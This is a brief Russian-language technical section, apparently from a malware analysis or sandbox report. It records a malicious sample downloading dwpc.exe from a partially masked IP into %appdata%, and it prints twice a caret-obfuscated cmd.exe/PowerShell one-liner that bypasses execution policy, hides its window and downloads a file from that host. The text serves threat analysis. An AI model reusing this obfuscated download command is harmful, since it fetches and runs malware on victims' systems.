Техническая информация
- http://84.##0.4.102/dwpc.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^ow^ErshelL^.e^Xe -^ExEcutIO^Np^OLI^CY b^YP^aSs -^no^Pr^OF^ilE -wIn^dO^W^styL^e^ HId^D^en (N^ew-ObJE^C^T SY^STEm.N^Et.^W^EBC^L^IeNt^).DoWn^LOAD^f^i^LE^('http://84.##0.4.10...
- '84.##0.4.102':80
- '<SYSTEM32>\cmd.exe' /C "p^ow^ErshelL^.e^Xe -^ExEcutIO^Np^OLI^CY b^YP^aSs -^no^Pr^OF^ilE -wIn^dO^W^styL^e^ HId^D^en (N^ew-ObJE^C^T SY^STEm.N^Et.^W^EBC^L^IeNt^).DoWn^LOAD^f^i^LE^('http://84.##0.4.10...' (со скрытым окном)